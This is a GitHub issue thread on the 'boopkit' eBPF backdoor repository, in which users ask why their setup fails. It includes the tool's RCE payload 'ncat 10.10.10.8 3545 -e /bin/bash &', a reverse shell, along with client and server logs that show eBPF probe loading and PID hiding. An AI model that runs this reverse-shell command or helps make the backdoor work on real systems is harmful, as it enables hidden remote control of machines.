search

krisnova / boopkit

Linux eBPF backdoor over TCP. Spawn reverse shells, RCE, on prior privileged access. Less Honkin, More Tonkin.
Apache License 2.0
1.57k stars 170 forks source link

Little confused about server and client connections- Hope to get answer #21

Open antonbek89 opened 2 months ago

antonbek89 commented 2 months ago

So I already compile Boopkit In the server side ip 10.10.10.10 I run the binary boopkit

In the client ip 10.10.10.8 i run the boopscript after i change the RHOST and the LHOST

RHOST = 10.10.10.10 LHOST = 10.10.10.8

The ports 22,3535,3545 open (inbound) from both side

When I try run it from the client 


  -> *[RCE]     : ncat 10.10.10.8 3545 -e /bin/bash &
  -> *[Local]   : 10.10.10.8:3535
  -> *[Remote]  : 10.10.10.10:22
================================================================
  -> [112 bytes]   TX SYN     : 10.10.10.10 (SOCK_RAW, RCE, *bad csum)
  -> [handshake]   CONN       : 10.10.10.10:22
  -> [060 bytes]   TX SYN     : 10.10.10.10:22
  <- [048 bytes]   RX SYN-ACK : 10.10.10.10:22 (RCE)
  -> [060 bytes]   TX ACK-RST : 10.10.10.10:22
  -> [hanging..]   CONN       : 10.10.10.8:3535 (listen...)

From server side

================================================================
  -> getuid()                : 0
  -> getpid()                : 1246
  -> getppid()               : 1064
  -> Logs                    : /sys/kernel/tracing/trace_pipe
  -> Loading eBPF Probe      : /root/.boopkit/pr0be.safe.o
  -> Starting xCap Interface : lo
  -> Initalizing Ring Buffer
  ->   eBPF Probe Loaded     : /root/.boopkit/pr0be.safe.o
  -> Loading eBPF Probe      : /root/.boopkit/pr0be.boop.o
  ->   eBPF Probe Loaded     : /root/.boopkit/pr0be.boop.o
  ->   eBPF Program Attached : tp/tcp/tcp_bad_csum
  ->   eBPF Program Attached : tp/tcp/tcp_receive_reset
  ->   eBPF   Map Name       : event
  -> Obfuscating PID         : 1246
  -> xCap RingBuffer Started : lo
================================================================
  ** Boop source: 10.10.10.8
  -> Search xCap Ring Buffer: 10.10.10.8
  -> Initalizing Ring Buffer
  -> Taking snapshot of network traffic.
  -> No RCE in xCap!
  -> Free Ring Buffer
  ** Boop source: 10.10.10.10
  -> Search xCap Ring Buffer: 10.10.10.10
  -> Initalizing Ring Buffer
  -> Taking snapshot of network traffic.
  -> No RCE in xCap!
  -> Free Ring Buffer
  ** Boop source: 10.10.10.10
  -> Search xCap Ring Buffer: 10.10.10.10
  -> Initalizing Ring Buffer
  -> Taking snapshot of network traffic.
  -> No RCE in xCap!
  -> Free Ring Buffer
  ** Boop source: 10.10.10.10
  -> Search xCap Ring Buffer: 10.10.10.10
  -> Initalizing Ring Buffer
  -> Taking snapshot of network traffic.
  -> No RCE in xCap!
  -> Free Ring Buffer

What I doing wrong?

cyrillaa commented 1 month ago

me too, I also want to know how to fix it image image